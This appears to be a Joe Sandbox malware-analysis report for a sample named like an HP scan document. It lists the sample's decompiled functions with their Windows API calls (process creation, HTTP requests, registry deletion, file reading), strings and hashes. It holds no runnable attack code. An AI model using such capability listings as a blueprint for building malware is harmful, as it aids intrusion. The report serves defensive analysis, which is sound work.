Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 2929c38b5d3de974fbf121fe97729e029d0f1a2ee344df9386f52b71dedebac5
Instruction ID: 921aab522a8fcdf0d3e9c881b381441dd966d4d0b9977d0fc1bf432ed46209bd
Opcode Fuzzy Hash: 2929c38b5d3de974fbf121fe97729e029d0f1a2ee344df9386f52b71dedebac5
Instruction Fuzzy Hash: CF81F471644605ABDB20AF64DC52FEE3BB8FF55300F044428FD05EA292EB74D985C7A2

Function 00875A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00875A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00875A40
SetWindowTextW.USER32(?,?), ref: 00875A57
GetDlgItem.USER32(?,000003EA), ref: 00875A6C
SetWindowTextW.USER32(00000000,?), ref: 00875A72
GetDlgItem.USER32(?,000003E9), ref: 00875A82
SetWindowTextW.USER32(00000000,?), ref: 00875A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00875AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00875AC3
GetWindowRect.USER32(?,?), ref: 00875ACC
_wcslen.LIBCMT ref: 00875B33
SetWindowTextW.USER32(?,?), ref: 00875B6F
GetDesktopWindow.USER32 ref: 00875B75
GetWindowRect.USER32(00000000), ref: 00875B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00875BD3
GetClientRect.USER32(?,?), ref: 00875BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00875C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00875C2F

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 5ec44f65475793e90bbb4036ddc8eaa5710ffb147dcc64e457d2cec6093d6857
Instruction ID: decb5fe27f74074c58b1c895b8db9e27d5c8acc989b14fc29134acc17d1be862
Opcode Fuzzy Hash: 5ec44f65475793e90bbb4036ddc8eaa5710ffb147dcc64e457d2cec6093d6857
Instruction Fuzzy Hash: F9715E31900B09AFDB20DFA8CE85BAEBBF5FF48714F108918E546E25A4D7B5E944CB50

Function 008300C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 008300C6

Part of subcall function 008300ED: InitializeCriticalSectionAndSpinCount.KERNEL32(008E070C,00000FA0,B29755C9,?,?,?,?,008523B3,000000FF), ref: 0083011C
Part of subcall function 008300ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,008523B3,000000FF), ref: 00830127
Part of subcall function 008300ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,008523B3,000000FF), ref: 00830138
Part of subcall function 008300ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0083014E
Part of subcall function 008300ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0083015C
Part of subcall function 008300ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0083016A
Part of subcall function 008300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00830195
Part of subcall function 008300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 008301A0

___scrt_fastfail.LIBCMT ref: 008300E7

Part of subcall function 008300A3: __onexit.LIBCMT ref: 008300A9

Strings

SleepConditionVariableCS, xrefs: 00830154
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00830122
kernel32.dll, xrefs: 00830133
WakeAllConditionVariable, xrefs: 00830162
InitializeConditionVariable, xrefs: 00830148

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: c3c251404636fc06099979f8c8149035b012c3da4daf9f894b0b6eea584d1319
Instruction ID: 17f7e1443fda2fa0ec677dcbb0946c34fabf2283feb8192e018bf8bff7dc3f86
Opcode Fuzzy Hash: c3c251404636fc06099979f8c8149035b012c3da4daf9f894b0b6eea584d1319
Instruction Fuzzy Hash: C1212932A44710ABF7216BA4AC55B2E37E4FB86B51F000539F911E6B92DFB89C40CED1

Function 008730F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0087318D
_wcslen.LIBCMT ref: 008731F8

Strings

REGEXPCLASS, xrefs: 00873255, 00873266
TEXT, xrefs: 0087347C
INSTANCE, xrefs: 00873453
CLASS, xrefs: 00873188, 008731A5
NAME, xrefs: 00873335, 00873346
CLASSNN, xrefs: 008731F3, 00873204

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 5ff9bb487eed4c1260b589676875ebbb50853c8ae9d75f33325765451c1b2c43
Instruction ID: a8903310516f2ce972266f22efa0093a4803da8f92431e932c1f5783b1840bc8
Opcode Fuzzy Hash: 5ff9bb487eed4c1260b589676875ebbb50853c8ae9d75f33325765451c1b2c43
Instruction Fuzzy Hash: 97E1F632A00516ABCB18DFB8C4516EDBBB4FF54710F54C22AE45AF7244DB30EE85A792

Function 008844C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,008ACC08), ref: 00884527
_wcslen.LIBCMT ref: 0088453B
_wcslen.LIBCMT ref: 00884599
_wcslen.LIBCMT ref: 008845F4
_wcslen.LIBCMT ref: 0088463F
_wcslen.LIBCMT ref: 008846A7

Part of subcall function 0082F9F2: _wcslen.LIBCMT ref: 0082F9FD

GetDriveTypeW.KERNEL32(?,008D6BF0,00000061), ref: 00884743

Strings

removable, xrefs: 008845EA, 008845EF
network, xrefs: 0088469D, 008846A2
unknown, xrefs: 00884708
cdrom, xrefs: 0088458F, 00884594
all, xrefs: 00884531, 00884536
fixed, xrefs: 00884635, 0088463A
ramdisk, xrefs: 008846F1

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 64c53274bc7adf205780037e0ddd82cbe532501d1841743233fa42873b4ba216
Instruction ID: 1795809cc986bef12928970d469b6e2a3ffc1338b9a9737f148706994aad65aa
Opcode Fuzzy Hash: 64c53274bc7adf205780037e0ddd82cbe532501d1841743233fa42873b4ba216
Instruction Fuzzy Hash: D6B1D2326083029FC710EF28C890A6EB7E5FFA5764F505A1DF596C7291E730D985CB92

Function 0089AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0089B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0089B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0089B1D4
_wcslen.LIBCMT ref: 0089B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0089B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0089B236
_wcslen.LIBCMT ref: 0089B332

Part of subcall function 008805A7: GetStdHandle.KERNEL32(000000F6), ref: 008805C6

_wcslen.LIBCMT ref: 0089B34B
_wcslen.LIBCMT ref: 0089B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0089B3B6
GetLastError.KERNEL32(00000000), ref: 0089B407
CloseHandle.KERNEL32(?), ref: 0089B439
CloseHandle.KERNEL32(00000000), ref: 0089B44A
CloseHandle.KERNEL32(00000000), ref: 0089B45C
CloseHandle.KERNEL32(00000000), ref: 0089B46E
CloseHandle.KERNEL32(?), ref: 0089B4E3

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 1a96fea8d7c4e6c6cdfbb195c6e657b13ea3c652380ff4d889d2b07ba57620fc
Instruction ID: 4dd3e8505f845647dc21546c79113bc06b0acd2c3450e187c81829c775ef6119
Opcode Fuzzy Hash: 1a96fea8d7c4e6c6cdfbb195c6e657b13ea3c652380ff4d889d2b07ba57620fc
Instruction Fuzzy Hash: 31F17A316083409FCB14EF28D991B6ABBE5FF85314F18855DF8999B2A2DB31EC44CB52

Function 0081326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(008E1990), ref: 00852F8D
GetMenuItemCount.USER32(008E1990), ref: 0085303D
GetCursorPos.USER32(?), ref: 00853081
SetForegroundWindow.USER32(00000000), ref: 0085308A
TrackPopupMenuEx.USER32(008E1990,00000000,?,00000000,00000000,00000000), ref: 0085309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008530A9

Strings

0, xrefs: 0081327D

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 94fd71e83c60b53b4478d7d16a7b60905e8bf602a07e86fe71312472c1b49cdd
Instruction ID: cb3b0390b68c57d7d2da324077aaf78a8969b7e641042054a35b57374cabceee
Opcode Fuzzy Hash: 94fd71e83c60b53b4478d7d16a7b60905e8bf602a07e86fe71312472c1b49cdd
Instruction Fuzzy Hash: 20712A30640205BEFB319F68DC49F9ABF69FF06365F204216F925EA1E0CBB1A954C791

Function 008A6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 008A6DEB

Part of subcall function 00816B57: _wcslen.LIBCMT ref: 00816B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 008A6E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 008A6E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008A6E94
DestroyWindow.USER32(?), ref: 008A6EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00810000,00000000), ref: 008A6EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008A6EFD
GetDesktopWindow.USER32 ref: 008A6F16
GetWindowRect.USER32(00000000), ref: 008A6F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 008A6F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 008A6F4D

Part of subcall function 00829944: GetWindowLongW.USER32(?,000000EB), ref: 00829952

Strings

0, xrefs: 008A6D98
tooltips_class32, xrefs: 008A6E58, 008A6EDD

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 36bf41e064833c3b7152ed2fe760692d05b8d6530907f194ed238bf39f391d69
Instruction ID: 289da819b61a33a9371dd613b6a62aa1bd4a654517839610801de84502fa31fe
Opcode Fuzzy Hash: 36bf41e064833c3b7152ed2fe760692d05b8d6530907f194ed238bf39f391d69
Instruction Fuzzy Hash: 88718A70144244AFEB21DF18DC48FAABBE9FB8A304F58041DF999C76A1EB70A915CB11

Function 008A911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00829BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00829BB2

DragQueryPoint.SHELL32(?,?), ref: 008A9147

Part of subcall function 008A7674: ClientToScreen.USER32(?,?), ref: 008A769A
Part of subcall function 008A7674: GetWindowRect.USER32(?,?), ref: 008A7710
Part of subcall function 008A7674: PtInRect.USER32(?,?,008A8B89), ref: 008A7720

SendMessageW.USER32(?,000000B0,?,?), ref: 008A91B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 008A91BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 008A91DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 008A9225
SendMessageW.USER32(?,000000B0,?,?), ref: 008A923E
SendMessageW.USER32(?,000000B1,?,?), ref: 008A9255
SendMessageW.USER32(?,000000B1,?,?), ref: 008A9277
DragFinish.SHELL32(?), ref: 008A927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 008A9371

Strings

@GUI_DRAGID, xrefs: 008A92E9
@GUI_DRAGFILE, xrefs: 008A9320
@GUI_DROPID, xrefs: 008A929E

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 73d452d13f84d404f9a7e1ba222ff6bc14bdfc57c470b6ae52ff7518ba1ba7dc
Instruction ID: 624af73d54d10553c33b979f34ffd718429212ee75017b73eda29cbdc8acb0c7
Opcode Fuzzy Hash: 73d452d13f84d404f9a7e1ba222ff6bc14bdfc57c470b6ae52ff7518ba1ba7dc
Instruction Fuzzy Hash: DF613971108301AFD701DF64DC85DAFBBE8FF99750F40092EF5A5922A1DB709A49CB92

Function 0088C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0088C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0088C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0088C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0088C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0088C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0088C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0088C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0088C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0088C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0088C5F0
InternetCloseHandle.WININET(00000000), ref: 0088C5FB

Strings

, xrefs: 0088C575

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: a4c70165717a8d843d91bad01e50f1d55076c0ac3c6bd6432236d323a1ceb987
Instruction ID: 63184e77b05627782cbb38657380b85fa893aee37ffb19a45f32875927373fd9
Opcode Fuzzy Hash: a4c70165717a8d843d91bad01e50f1d55076c0ac3c6bd6432236d323a1ceb987
Instruction Fuzzy Hash: 64516BB1500608BFEB21AF64C988AAB7BFCFF09754F00442AF945D6614DB34E944DBB0

Function 008A856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 008A8592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008A85A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008A85AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008A85BA
GlobalLock.KERNEL32(00000000), ref: 008A85C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008A85D7
GlobalUnlock.KERNEL32(00000000), ref: 008A85E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008A85E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008A85F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,008AFC38,?), ref: 008A8611
GlobalFree.KERNEL32(00000000), ref: 008A8621
GetObjectW.GDI32(?,00000018,?), ref: 008A8641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 008A8671
DeleteObject.GDI32(?), ref: 008A8699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 008A86AF

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: c2679540819a2cbe7381f3f1319e5b9ef488523b99e211982f8c49ef104f507c
Instruction ID: 42cd6b5193a319e3d9b5356e900d7d437a3778a5596c26dd4d6cf6c2285dafca
Opcode Fuzzy Hash: c2679540819a2cbe7381f3f1319e5b9ef488523b99e211982f8c49ef104f507c
Instruction Fuzzy Hash: 84410975600208EFEB119FA5CC48EAABBB8FF9AB15F104058F909E7660DB309901CB60

Function 008814BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00881502
VariantCopy.OLEAUT32(?,?), ref: 0088150B
VariantClear.OLEAUT32(?), ref: 00881517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 008815FB
VarR8FromDec.OLEAUT32(?,?), ref: 00881657
VariantInit.OLEAUT32(?), ref: 00881708
SysFreeString.OLEAUT32(?), ref: 0088178C
VariantClear.OLEAUT32(?), ref: 008817D8
VariantClear.OLEAUT32(?), ref: 008817E7
VariantInit.OLEAUT32(00000000), ref: 00881823

Strings

Default, xrefs: 008816AF
%4d%02d%02d%02d%02d%02d, xrefs: 00881625

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: a3c69f06dd0a4910dd5597ea30e7a4afcf0ab51f7a114fc18c78c5d42f3a077f
Instruction ID: c44098da40c5ee549eeaed36d892344f334570db31ed73c0a1cb95376cc85004
Opcode Fuzzy Hash: a3c69f06dd0a4910dd5597ea30e7a4afcf0ab51f7a114fc18c78c5d42f3a077f
Instruction Fuzzy Hash: 8CD1D071A0011ADBDF10AF69E889B79B7B9FF46704F10805AE446EB581DF30DD82DB52

Function 0089B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00819CB3: _wcslen.LIBCMT ref: 00819CBD

Part of subcall function 0089C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0089B6AE,?,?), ref: 0089C9B5
Part of subcall function 0089C998: _wcslen.LIBCMT ref: 0089C9F1
Part of subcall function 0089C998: _wcslen.LIBCMT ref: 0089CA68
Part of subcall function 0089C998: _wcslen.LIBCMT ref: 0089CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0089B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0089B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0089B80A
RegCloseKey.ADVAPI32(?), ref: 0089B87E
RegCloseKey.ADVAPI32(?), ref: 0089B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0089B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0089B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0089B922
FreeLibrary.KERNEL32(00000000), ref: 0089B983
RegCloseKey.ADVAPI32(00000000), ref: 0089B994

Strings

RegDeleteKeyExW, xrefs: 0089B8FE
advapi32.dll, xrefs: 0089B8ED

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 2467d34105e4abd42b48c4294a79c9d58935356093d2b26c5c20f79f67435d10
Instruction ID: d4457c2886bc2d03499b830249e796574ffac36c1c4d1abf59f7af4defd28225
